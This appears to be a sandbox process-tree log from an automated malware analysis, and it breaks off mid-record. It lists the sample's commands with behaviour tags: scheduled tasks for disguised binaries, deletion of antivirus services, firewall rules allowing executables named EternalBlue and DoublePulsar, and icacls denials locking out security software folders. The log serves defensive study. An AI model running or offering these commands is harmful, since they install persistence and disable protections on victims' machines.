C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c gpupdate /force5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
-
C:\Windows\system32\gpupdate.exegpupdate /force6⤵
-
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\SystemC" /TR "C:\Programdata\RealtekHD\taskhostw.exe" /SC MINUTE /MO 14⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\SysWOW64\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\Cleaner" /TR "C:\Programdata\WindowsTask\winlogon.exe" /SC ONLOGON /RL HIGHEST4⤵
- Scheduled Task/Job: Scheduled Task
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\H.bat4⤵
- Drops file in Drivers directory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c C:\programdata\microsoft\temp\Temp.bat4⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV15⤵
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 5 /NOBREAK5⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\timeout.exeTIMEOUT /T 3 /NOBREAK5⤵
- Delays execution with timeout.exe
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM 1.exe /T /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\taskkill.exeTASKKILL /IM P.exe /T /F5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Windows\SysWOW64\attrib.exeATTRIB +H +S C:\Programdata\Windows5⤵
- Views/modifies file attributes
-
-
-
-
-
C:\programdata\install\ink.exeC:\programdata\install\ink.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appidsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc start appidsvc3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc start appmgmt2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc start appmgmt3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appidsvc start= auto2⤵
-
C:\Windows\SysWOW64\sc.exesc config appidsvc start= auto3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc config appmgmt start= auto2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc config appmgmt start= auto3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete swprv2⤵
-
C:\Windows\SysWOW64\sc.exesc delete swprv3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop mbamservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc stop bytefenceservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete bytefenceservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete bytefenceservice3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete mbamservice2⤵
-
C:\Windows\SysWOW64\sc.exesc delete mbamservice3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete crmsvc2⤵
-
C:\Windows\SysWOW64\sc.exesc delete crmsvc3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete "windows node"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete "windows node"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop Adobeflashplayer2⤵
-
C:\Windows\SysWOW64\sc.exesc stop Adobeflashplayer3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AdobeFlashPlayer2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AdobeFlashPlayer3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MoonTitle2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc stop MoonTitle3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MoonTitle"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MoonTitle"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop AudioServer2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\sc.exesc stop AudioServer3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete AudioServer"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete AudioServer"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop clr_optimization_v4.0.30318_642⤵
-
C:\Windows\SysWOW64\sc.exesc stop clr_optimization_v4.0.30318_643⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete clr_optimization_v4.0.30318_64"2⤵
-
C:\Windows\SysWOW64\sc.exesc delete clr_optimization_v4.0.30318_64"3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc stop MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc stop MicrosoftMysql3⤵
- Launches sc.exe
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c sc delete MicrosoftMysql2⤵
-
C:\Windows\SysWOW64\sc.exesc delete MicrosoftMysql3⤵
- Launches sc.exe
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall set allprofiles state on2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall set allprofiles state on3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=TCP localport=445 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Blocking" protocol=UDP localport=445 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=TCP localport=139 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Port Block" protocol=UDP localport=139 action=block dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Service" dir=in action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Service" dir=in action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Recovery Services" dir=out action=allow program="C:\ProgramData\WindowsTask\MicrosoftHost.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shadow Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AppModule.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Security Services" dir=out action=allow program="C:\ProgramData\WindowsTask\AMD.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Survile Service" dir=in action=allow program="C:\ProgramData\RealtekHD\taskhostw.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="System Service" dir=in action=allow program="C:\ProgramData\windows\rutserv.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Shell Service" dir=in action=allow program="C:\ProgramData\rundll\system.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Script Service" dir=in action=allow program="C:\ProgramData\rundll\rundll.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Micro Service" dir=in action=allow program="C:\ProgramData\rundll\Doublepulsar-1.3.1.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="Small Service" dir=in action=allow program="C:\ProgramData\rundll\Eternalblue-2.2.0.exe" enable=yes3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort1" protocol=TCP localport=9494 action=allow dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort2" protocol=TCP localport=9393 action=allow dir=IN3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort3" protocol=TCP localport=9494 action=allow dir=out3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh advfirewall firewall add rule name="AllowPort4" protocol=TCP localport=9393 action=allow dir=out3⤵
- Modifies Windows Firewall
- Event Triggered Execution: Netsh Helper DLL
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Microsoft JDX" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Common Files\System\iediagcmd.exe" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\svchost.exe" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\programdata\microsoft\clr_optimization_v4.0.30318_64" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Windows\Fonts\Mysql" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "c:\program files\Internet Explorer\bin" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\Zaxar" /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Windows\speechstracing /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny Admin:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls c:\programdata\Malwarebytes /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls c:\programdata\Malwarebytes /deny System:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny %username%:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny Admin:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\MB3Install /deny System:(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\MB3Install /deny System:(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\Programdata\Indus /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\Programdata\Indus /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\Driver Foundation Visions VHG" /deny System:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\AdwCleaner /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\AdwCleaner /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\ByteFence" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\ByteFence" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls C:\KVRT_Data /deny system:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls C:\KVRT_Data /deny system:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\360" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\360" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\ProgramData\360safe" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\ProgramData\360safe" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Malwarebytes" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Malwarebytes" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\COMODO" /deny %username%:(OI)(CI)(F)2⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\COMODO" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\Enigma Software Group" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\Enigma Software Group" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\SpyHunter" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\SpyHunter" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files (x86)\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Programdata\AVAST Software" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Programdata\AVAST Software" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
C:\Windows\SysWOW64\icacls.exeicacls "C:\Program Files\AVG" /deny Admin:(OI)(CI)(F)3⤵
- Modifies file permissions
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c icacls "C:\Program Files (x86)\AVG" /deny %username%:(OI)(CI)(F)2⤵
-
